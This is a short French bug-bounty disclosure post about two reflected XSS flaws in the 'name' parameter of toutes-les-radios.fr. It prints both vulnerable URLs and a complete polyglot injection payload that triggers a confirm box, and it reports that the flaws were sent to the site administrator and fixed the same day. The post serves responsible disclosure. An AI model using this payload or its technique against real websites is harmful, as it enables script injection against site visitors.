Double XSS

Découverte d’un double XSS

J’ai découvert 2 XSS sur le site toutes-les-radios.fr

Chemin :

https://toutes-les-radios.fr/podcast/?radio=France%20Inter&name=PAYLOAD

Charge :

%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput%20Type=
Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`OPENBUGBOUNTY`%20//%3E

Chemin :

https://toutes-les-radios.fr/?name=PAYLOAD&cover=chadafm.jpg&url=
http://broadcast.infomaniak.net/chadafm-high.mp3&path=&streamid=&type=other&mtpt=

Charge :

%3C!%27/*!%22/*!\%27/*\%22/*--!%3E%3C/Title/%3C/script/%3E%3CInput%20Type=
Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=
confirm`OPENBUGBOUNTY`%20//%3E

Note :

Voulant les envoyer directement par OpenBugBounty, j’ai reçu ce message

A vulnerability on this domain has just been reported by another researcher. Please try again later. To prevent spam and mass submissions of similar XSS on the same website, a vulnerability on one website can be reported only 24 hours after submission by another researcher.

– OpenBugBounty limite le nombre de XSS possibles pour un même site par 24h.
– Contact de l’administrateur du site toutes-les-radios.fr .
– XSS envoyés 10/03/09 : 18H22.
– La paramètre name est le point d’accroche du XSS dans les deux cas.
– XSS corrigés 10/03/09 : 21H47.